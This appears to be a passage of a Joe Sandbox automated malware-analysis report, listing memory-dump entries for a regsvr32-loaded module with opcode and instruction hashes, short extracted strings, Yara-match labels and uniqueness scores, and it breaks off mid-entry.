                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o^
                                                                      • API String ID: 0-3380573087
                                                                      • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                      • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                      • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                      • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8N
                                                                      • API String ID: 0-1657423088
                                                                      • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                      • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                      • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                      • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J3n
                                                                      • API String ID: 0-3694000235
                                                                      • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                      • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                      • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                      • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c&A
                                                                      • API String ID: 0-649646960
                                                                      • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                      • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                      • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                      • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (3
                                                                      • API String ID: 0-2570504824
                                                                      • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                      • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                      • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                      • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [r\^
                                                                      • API String ID: 0-4041245994
                                                                      • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                      • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                      • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                      • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                      • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                      • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                      • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [[x
                                                                      • API String ID: 0-2553898450
                                                                      • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                      • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                      • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                      • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g\&
                                                                      • API String ID: 0-1994035986
                                                                      • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                      • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                      • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                      • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                      • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                      • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                      • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GfMu
                                                                      • API String ID: 0-241548529
                                                                      • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                      • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                      • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                      • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: k|
                                                                      • API String ID: 0-998972391
                                                                      • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                      • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                      • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                      • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: wz_
                                                                      • API String ID: 0-2163964638
                                                                      • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                      • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                      • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                      • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {?Q
                                                                      • API String ID: 0-927583641
                                                                      • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                      • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                      • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                      • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |}6\
                                                                      • API String ID: 0-3074799505
                                                                      • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                      • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                      • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                      • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3&a
                                                                      • API String ID: 0-537350193
                                                                      • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                      • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                      • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                      • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o0:X
                                                                      • API String ID: 0-645126758
                                                                      • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                      • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                      • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                      • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D4}
                                                                      • API String ID: 0-491520632
                                                                      • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                      • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                      • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                      • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 1583075380-0
                                                                      • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                      • Instruction ID: 0c4797edc4d68ad41c9bd9b72ab1fdb4d18c339664a662d4c0b4ded2861e2ff4
                                                                      • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                      • Instruction Fuzzy Hash: B6A16322B1868181EB649F259A557BEA392EB86BC4F48C136DE4D5BE4DCF7CE4019300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
• Instruction ID: 721d2d90ccb0b87a5a2bd2795c87ec510544ff674bf926817391bac9c10dbac5
• Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
• Instruction Fuzzy Hash: A871CE72F181428BE31C8B18ED5567866D6E7E6304F5CC035DA0E8AFD9EBB9F9009B00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
• Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
• Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
• Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
• Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
• Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
• Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
• Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
• Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
• Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
• Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
• Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
• Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
• Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
• Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
• Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
• Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
• Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
• Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
• Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
• Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
• Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
• Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
• Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
• Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
• Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
• Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
• Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
• Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
• Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
• Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
• Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
• Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
• Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
• Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
• Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
• Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
